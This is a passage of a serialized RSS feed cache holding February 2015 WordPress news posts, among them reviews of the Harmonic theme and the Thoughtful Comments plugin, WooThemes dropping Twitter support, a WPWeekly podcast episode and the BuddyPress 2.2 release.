Bloggers\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=38617\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:81:\"http://wptavern.com/harmonic-a-bold-free-wordpress-theme-for-artists-and-bloggers\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3114:\"<p>If you like designs that feature stunning, fullscreen background images, then Automattic’s latest free theme release is a prime candidate for your next blog redesign. <a href=\"https://wordpress.org/themes/harmonic\" target=\"_blank\">Harmonic</a> recently landed on WordPress.org and is rapidly closing in on 3,000 downloads.</p>\n<p>This theme puts the spotlight on your images and content. Harmonic’s striking homepage is accompanied by a minimalist, one-column blog design and an optional portfolio page template.</p>\n<p><a href=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/02/harmonic.png\" rel=\"prettyphoto[38617]\"><img src=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/02/harmonic.png?resize=880%2C660\" alt=\"harmonic\" class=\"aligncenter size-full wp-image-38619\" /></a></p>\n<p>Each section of the scrolling front page has options in the customizer that let you assign a unique display. The customizer allows you to easily set a background for the news, page, widgets, and portfolio sections. You can even include a background shade so that the title and tagline are more readable. The Visibility options allow you to hide any of the sections you’re not currently using.</p>\n<p><a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/02/harmonic-customizer.png\" rel=\"prettyphoto[38617]\"><img src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/02/harmonic-customizer.png?resize=1025%2C542\" alt=\"harmonic-customizer\" class=\"aligncenter size-full wp-image-38629\" /></a></p>\n<p>Single posts and pages with a featured image will display in a fullscreen design similar to the homepage. The blog archive is available with your choice of a one or two-column layout.</p>\n<p>With the addition of Jetpack, Harmonic also supports site logo upload and a portfolio. The customizer includes options for three different thumbnail aspect ratios, including: landscape (4:3), portrait (3:4), and square (1:1).</p>\n<p><a href=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/02/media.jpg\" rel=\"prettyphoto[38617]\"><img src=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/02/media.jpg?resize=1025%2C748\" alt=\"media\" class=\"aligncenter size-full wp-image-38635\" /></a></p>\n<p>Harmonic includes a custom menu for social links and has support for 16 different social networks. Check out the <a href=\"https://harmonicdemo.wordpress.com/\" target=\"_blank\">live demo</a> on WordPress.com to see the theme in action.</p>\n<p>With the release of <a href=\"https://wordpress.org/themes/harmonic\" target=\"_blank\">Harmonic</a> for self-hosted sites, Automattic now has 60 free themes available in the directory. This theme caters to visual artists and bloggers who have large images to showcase in the background, portfolio, or gallery sections of the site.</p>\n<p>Harmonic is unique in that it transforms featured images and titles into a splash page style intro to single posts. If you want to use images to make a strong impact on your reader, this theme fits the bill. It’s available on both WordPress.com and self-hosted WordPress sites via the admin themes browser.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 06 Feb 2015 08:19:58 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:32;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:22:\"Matt: Real NFL Scandal\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:21:\"http://ma.tt/?p=44652\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:38:\"http://ma.tt/2015/02/real-nfl-scandal/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1108:\"<blockquote><p>Seattle’s decision to throw the ball at the goal line with 20 seconds to go in last night’s Super Bowl was a costly one. But in the long run, it won’t be nearly as costly to the rest of the United States as the National Football League (NFL) itself.</p>\n<p>Every year, the NFL rakes in around $9.5 billion in revenue. Its commissioner, Roger Goodell, meanwhile, has an annual salary of $44 million. And while those numbers might make sense for any big business, the NFL isn’t a business – not technically, at least.</p>\n<p>According to the Public Law 89-800, it’s a 501(c)6 tax-exempt nonprofit. That’s right, a nonprofit. In other words, the NFL, one of the most lucrative organizations in all of sports, is subsidized by you and me the taxpayers.</p></blockquote>\n<p>From <a href=\"http://www.truth-out.org/opinion/item/28885-the-real-nfl-scandal\">The Real NFL Scandal</a>. If you’re curious, here’s a <a href=\"http://en.wikipedia.org/wiki/Category:501(c)(6)_nonprofit_organizations\">list of other notable 501(c)(6) organizations</a>.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 06 Feb 2015 00:47:45 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:33;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:67:\"WPTavern: Why WooThemes is Smart to Discontinue Its Twitter Support\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=38563\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:77:\"http://wptavern.com/why-woothemes-is-smart-to-discontinue-its-twitter-support\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3992:\"<p><a href=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/02/woo-support-twitter-account.jpg\" rel=\"prettyphoto[38563]\"><img src=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/02/woo-support-twitter-account.jpg?resize=1025%2C495\" alt=\"woo-support-twitter-account\" class=\"aligncenter size-full wp-image-38610\" /></a></p>\n<p>WooThemes <a href=\"http://www.woothemes.com/2015/02/retiring-woosupport-twitter/\" target=\"_blank\">announced</a> this week that it will be retiring @WooSupport, its Twitter support account, in favor of other support channels. Social media manager Marina Pape reports that support at the company is otherwise healthy. “On the contrary, our support is cooking with Customer Happiness this week averaging 90%, all support teams coming in under 24 hours for first-reply time,” she said.</p>\n<p>WooThemes, like many other WordPress product and service providers, had expanded channels to try to offer support on as many different social channels as possible. Last October, the company <a href=\"http://www.woothemes.com/2014/10/glimpse-world-woosupport/\" target=\"_blank\">announced</a> changes in its support structure:</p>\n<blockquote><p>We’re opening more and more avenues of communication like the Community, the @WooSupport Twitter handle, and a streamlined Knowledge Base, as well as actively monitoring our social media and ideas boards. You name it, we’re working on it.</p></blockquote>\n<p>Over the past several months, WooThemes has discovered that offering Twitter support is more trouble than it’s worth. “Questions get technical and DMs and 140 characters are not ideal facilitators of such things,” Pape said in the announcement.</p>\n<p>“Yes, we want to encourage conversation. Yes, we want to have an ear to the ground and be able to help people when the rubber hits the road for them and escalate tickets if people have been waiting for unusually long periods,” she said. <strong>“But the truth of the matter is Twitter is not the place to handle support queries and when we try we shoot ourselves in the collective foot.”</strong></p>\n<p>WooThemes is making a smart move to pull back from a medium that wasn’t built to handle complex support queries. Instead of spreading staff thin over every social avenue, the company is concentrating on channeling users through an established ticketing system that is already working.</p>\n<p>While anyone can use Twitter for whatever purpose, within its 140 character limit, the brevity that the medium was designed for is not a good fit for managing support. If users find frustration in communicating within Twitter’s limited capacity, support on this channel is a waste of company time and resources.</p>\n<p>“But after letting @WooSupport run for a while, we realized what it was actually doing was creating an expectation that we never intended to meet which was that we were able to actually give support over Twitter,” Pape explained. <strong>“140 characters are not enough to talk about the weather let alone why your custom-built-million-moving-parts website is breaking.”</strong></p>\n<p>WooThemes is opting to limit support to its ZenDesk ticketing system, instead of having social media managers playing middleman via tweets. “DMs on Twitter to get details and sort out problems is akin to birthing pineapples,” Pape said. Encouraging the ticketing system as the primary avenue of support is a move toward greater efficiency.</p>\n<p>WordPress hosting companies and product/service providers would do well to examine how they are using their various social channels and whether or not some could be trimmed back in favor of more suitable mediums for communication. Cutting out Twitter support may not be the answer for every product or customer demographic, but being “always on” and “always available” via every channel is not a realistic approach to support.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 05 Feb 2015 20:56:01 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:34;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:95:\"WPTavern: Thoughtful Comments Plugin Adds Comment Moderation Links to the Frontend of WordPress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=38542\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:105:\"http://wptavern.com/thoughtful-comments-plugin-adds-comment-moderation-links-to-the-frontend-of-wordpress\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3054:\"<a href=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/02/ThoughfulCommentsFeaturedImage.png\" rel=\"prettyphoto[38542]\"><img class=\"size-full wp-image-38557\" src=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/02/ThoughfulCommentsFeaturedImage.png?resize=669%2C348\" alt=\"Thoughful Comments Featured Image\" /></a>photo credit: <a href=\"http://www.flickr.com/photos/98640399@N08/9410826173\">GirlOnRail_BKGs_BartaIV 1024×768</a> – <a href=\"https://creativecommons.org/licenses/by/2.0/\">(license)</a>\n<p>The backend of WordPress has a set of tools to help administrators moderate comments, but what if you could bring some of those tools to the frontend? Developed by <a title=\"http://foliovision.com\" href=\"http://foliovision.com\">Foliovision</a>, <a title=\"https://wordpress.org/plugins/thoughtful-comments/\" href=\"https://wordpress.org/plugins/thoughtful-comments/\">Thoughtful Comments</a> is compatible with Jetpack Comments and adds the following links to comments on the frontend of WordPress:</p>\n<ul>\n<li>Approve</li>\n<li>Delete</li>\n<li>Delete Thread</li>\n<li>Delete and Ban IP</li>\n<li>Delete Thread and Ban IP</li>\n</ul>\n<p>Usernames highlighted in red indicate a comment that’s in the moderation queue. You can either approve, delete, or delete and ban the IP address of moderated comments. It’s important to note that deleted comments are sent to the trash instead of being removed completely from WordPress. For this reason, I think the Delete link should be renamed to Trash so its function makes more sense.</p>\n<a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/02/CommentInModeration.png\" rel=\"prettyphoto[38542]\"><img class=\"size-full wp-image-38554\" src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/02/CommentInModeration.png?resize=708%2C293\" alt=\"Comment in Moderation Status\" /></a>Comment in Moderation Status\n<p>You can also delete entire threads.</p>\n<a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/02/ThoughtfulCommentsLinks.png\" rel=\"prettyphoto[38542]\"><img class=\"size-full wp-image-38555\" src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/02/ThoughtfulCommentsLinks.png?resize=640%2C267\" alt=\"Various Administration Links\" /></a>Various Administration Links\n<p>Editing posts, administering comments, and managing a site from the frontend is a huge time saver. With <a title=\"https://wordpress.org/plugins/wp-front-end-editor/\" href=\"https://wordpress.org/plugins/wp-front-end-editor/\">certain aspects of WordPress</a> making their way to the frontend, I wouldn’t be surprised if one day, the features within Thoughtful Comments end up in core. In the future, I think users will expect to be able to accomplish specific tasks like these without having to browse through clunky administration screens.</p>\n<p>Thoughtful Comments is compatible with WordPress 4.1 and available from the <a title=\"https://wordpress.org/plugins/thoughtful-comments/\" href=\"https://wordpress.org/plugins/thoughtful-comments/\">WordPress plugin directory</a>.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 05 Feb 2015 18:33:53 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:35;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:78:\"WPTavern: WPWeekly Episode 178 – A Conversation With Frenemy Brian Krogsgard\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:44:\"http://wptavern.com?p=38572&preview_id=38572\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:84:\"http://wptavern.com/wpweekly-episode-178-a-conversation-with-frenemy-brian-krogsgard\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3687:\"<p>In this episode of WordPress Weekly, <a title=\"http://marcuscouch.com/\" href=\"http://marcuscouch.com/\">Marcus Couch</a> and I are joined by the founder of <a title=\"https://poststatus.com/\" href=\"https://poststatus.com/\">PostStatus</a>, Brian Krogsgard. He explains how his experience writing for WPCandy provided the foundation to launch PostStatus. We find out how well the <a title=\"https://poststatus.com/club/\" href=\"https://poststatus.com/club/\">PostStatus club</a> is doing since launching two weeks ago. Last but not least, we discuss whether or not Krogsgard has the right ingredients to be financially successful in the WordPress content business.</p>\n<h2>Stories Discussed:</h2>\n<p><a title=\"http://wptavern.com/envato-stats-tips-for-getting-things-done-and-more-at-pressnomics-3\" href=\"http://wptavern.com/envato-stats-tips-for-getting-things-done-and-more-at-pressnomics-3\">Recap of PressNomics 3</a><br />\n<a title=\"http://wptavern.com/human-made-acquires-australian-based-wordpress-agency-sennza\" href=\"http://wptavern.com/human-made-acquires-australian-based-wordpress-agency-sennza\">Human Made Acquires Australian Based WordPress Agency Sennza</a><br />\n<a title=\"http://wptavern.com/zero-day-vulnerability-discovered-in-fancybox-for-wordpress-plugin\" href=\"http://wptavern.com/zero-day-vulnerability-discovered-in-fancybox-for-wordpress-plugin\">Zero Day Vulnerability Discovered in Fancybox for WordPress Plugin</a><br />\n<a title=\"http://wptavern.com/buddypress-2-2-spumoni-released-featuring-new-member-type-api\" href=\"http://wptavern.com/buddypress-2-2-spumoni-released-featuring-new-member-type-api\">BuddyPress 2.2 Spumoni Released, Featuring New Member Type API</a></p>\n<h2>Plugins Picked By Marcus:</h2>\n<p><a title=\"https://wordpress.org/plugins/user-roles-and-capabilities/\" href=\"https://wordpress.org/plugins/user-roles-and-capabilities/\">User Roles and Capabilities</a> allows you to manage user roles and capabilities. Using this plugin, you can create new roles and delete existing roles.</p>\n<p><a title=\"https://wordpress.org/plugins/wp-style-kit/\" href=\"https://wordpress.org/plugins/wp-style-kit/\">WP Style Kit</a> is a plugin that adds additional features to the Custom Styles section of the Visual Editor. You can add beautiful custom styles such as, additional headlines, custom bullets, circles, quotes, and call out boxes.</p>\n<p><a title=\"https://wordpress.org/plugins/pet-adoption-listings/\" href=\"https://wordpress.org/plugins/pet-adoption-listings/\">Pet Adoption Listings</a> provides two easy ways to display listings of adoptable pets from a shelter’s profile at Adopt-a-Pet.com via an iframe.</p>\n<p><a title=\"https://wordpress.org/plugins/login-joomla-users/\" href=\"https://wordpress.org/plugins/login-joomla-users/\">Login Joomla Users</a> allows migrated users from Joomla to login to WordPress. Tested on WordPress 4.1 with users migrated from Joomla 2.5.9. After the first successful login, the password field will automatically be hashed by WordPress.</p>\n<h2>WPWeekly Meta:</h2>\n<p><strong>Next Episode:</strong> Wednesday, February 11th 9:30 P.M. Eastern</p>\n<p><strong>Subscribe To WPWeekly Via Itunes: </strong><a href=\"https://itunes.apple.com/us/podcast/wordpress-weekly/id694849738\" target=\"_blank\">Click here to subscribe</a></p>\n<p><strong>Subscribe To WPWeekly Via RSS: </strong><a href=\"http://www.wptavern.com/feed/podcast\" target=\"_blank\">Click here to subscribe</a></p>\n<p><strong>Subscribe To WPWeekly Via Stitcher Radio: </strong><a href=\"http://www.stitcher.com/podcast/wordpress-weekly-podcast?refid=stpr\" target=\"_blank\">Click here to subscribe</a></p>\n<p><strong>Listen To Episode #178:</strong><br />\n</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 05 Feb 2015 17:33:40 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:36;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:26:\"Matt: Great Doctorow Essay\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:21:\"http://ma.tt/?p=44631\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:42:\"http://ma.tt/2015/02/great-doctorow-essay/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:157:\"<p>Cory Doctorow on <a href=\"http://www.wired.com/2014/12/government-computer-security\">How Laws Restricting Tech Actually Expose Us to Greater Harm</a>.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 05 Feb 2015 05:50:00 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:37;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:72:\"WPTavern: BuddyPress 2.2 Spumoni Released, Featuring New Member Type API\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=37925\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:81:\"http://wptavern.com/buddypress-2-2-spumoni-released-featuring-new-member-type-api\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:5548:\"<p><a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/02/l-and-b.jpg\" rel=\"prettyphoto[37925]\"><img src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/02/l-and-b.jpg?resize=1025%2C498\" alt=\"l-and-b\" class=\"aligncenter size-full wp-image-38537\" /></a></p>\n<p>BuddyPress 2.2 “<a href=\"https://buddypress.org/2015/02/buddypress-2-2-spumoni/\" target=\"_blank\">Spumoni</a>” was released today. The name pays tribute to<a href=\"http://www.spumonigardens.com/\" target=\"_blank\"> L&B Spumoni Gardens</a>, a 70 year old, family-owned pizza joint in Brooklyn, NY. This release is packed full of features that offer developers more flexibility in extending BuddyPress.</p>\n<h2>New Member Type API</h2>\n<p>BuddyPress 2.2 introduces a basic <a href=\"http://wptavern.com/buddypress-2-2-on-track-to-provide-a-basic-member-type-api\" target=\"_blank\">Member Type API</a> that developers can use to create different user types, i.e. student, teacher, etc. This new API is a huge step forward for building niche social networks on top of WordPress. It makes it possible to restrict content, filter the member directory, assign different permissions, etc., based on different member types.</p>\n<p><a href=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/02/member-types.png\" rel=\"prettyphoto[37925]\"><img src=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/02/member-types.png?resize=304%2C173\" alt=\"member-types\" class=\"aligncenter size-full wp-image-38546\" /></a></p>\n<p>The API does nothing visible for users in this first iteration but can be utilized to create plugins that register different member types and build out further capabilities from there. Admins will be able to change a user’s member type, which is currently limited to one, via a new meta box that is added to the community profile screen.</p>\n<h2>Custom Post Type Support Added to the Activity Stream</h2>\n<p>Custom post type support for the activity stream is a major feature that has been <a href=\"https://buddypress.trac.wordpress.org/ticket/3460\" target=\"_blank\">three years in the making</a>. Developers can now add support for their post types to be tracked in the activity stream in the same way that updates appear for regular posts via the blogs component. Adding support for CPTs is as simple as including one line of code:</p>\n<pre class=\"brush: php; light: true; title: ; notranslate\">add_post_type_support( \'book\', \'buddypress-activity\' );</pre>\n<p>Note that this feature isn’t automatically turned on – a custom post type must declare support for it. The single line of code will add a generic update that can be further customized via arguments added when registering the post type. Comment support for CPT activity items is also optional.</p>\n<p><a href=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2014/12/cpt-activity.png\" rel=\"prettyphoto[37925]\"><img src=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2014/12/cpt-activity.png?resize=1025%2C326\" alt=\"cpt-activity\" class=\"aligncenter size-full wp-image-35302\" /></a></p>\n<p>Custom post types with activity stream support can then be easily sorted via the activity dropdown filters:</p>\n<p><a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2014/12/activity-dropdown.png\" rel=\"prettyphoto[37925]\"><img src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2014/12/activity-dropdown.png?resize=1025%2C366\" alt=\"activity-dropdown\" class=\"aligncenter size-full wp-image-35299\" /></a></p>\n<p>Check out the BuddyPress codex for more information on <a href=\"https://codex.buddypress.org/plugindev/post-types-activities/#adding-the-buddypress-support-and-specific-labels-at-post-type-registration\" target=\"_blank\">how to customize activity attributes</a> when registering a custom post type.</p>\n<p>This release also <a href=\"http://wptavern.com/buddypress-2-2-will-add-support-for-composer\" target=\"_blank\">adds support for Composer</a>. BuddyPress will soon be listed at <a href=\"https://packagist.org/\" target=\"_blank\">Packagist.org</a> now that the official release is out.</p>\n<p>Other notable features and improvements include:</p>\n<ul>\n<li>Several new query API’s (based on WordPress improvements) for retrieving more specific results</li>\n<li>Continued cache enhancements, particularly for multi-site and multi-network WordPress configurations</li>\n<li>Message Meta – Private message conversations are now more flexible with an additional metadata table</li>\n<li>The Activity and Extended Profiles components now support advanced conditional logic, like nested clauses and multiple operators — A AND ( B OR C ). The Activity component now also supports querying by multiple scopes.</li>\n<li>Mentions: Better support for responsive devices</li>\n<li>Improved UI for managing messages, new “Read/Unread” links for each message thread, better bulk message management</li>\n<li>Numerous improvements to the Legacy template pack</li>\n<li>Increased coverage of inline code documentation, actions, and filters</li>\n</ul>\n<p>Check out the full list of improvements on the <a href=\"https://codex.buddypress.org/releases/version-2-2/\" target=\"_blank\">2.2 version page</a> in the codex.</p>\n<p>BuddyPress 2.2 is the result of several months of hard work from 44 contributors. The new features in this release enable the plugin to be more flexible for building niche social networks with different user types and custom content types integrated into the activity stream. The official BuddyPress 2.2 update is now available via the WordPress admin.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 05 Feb 2015 00:26:28 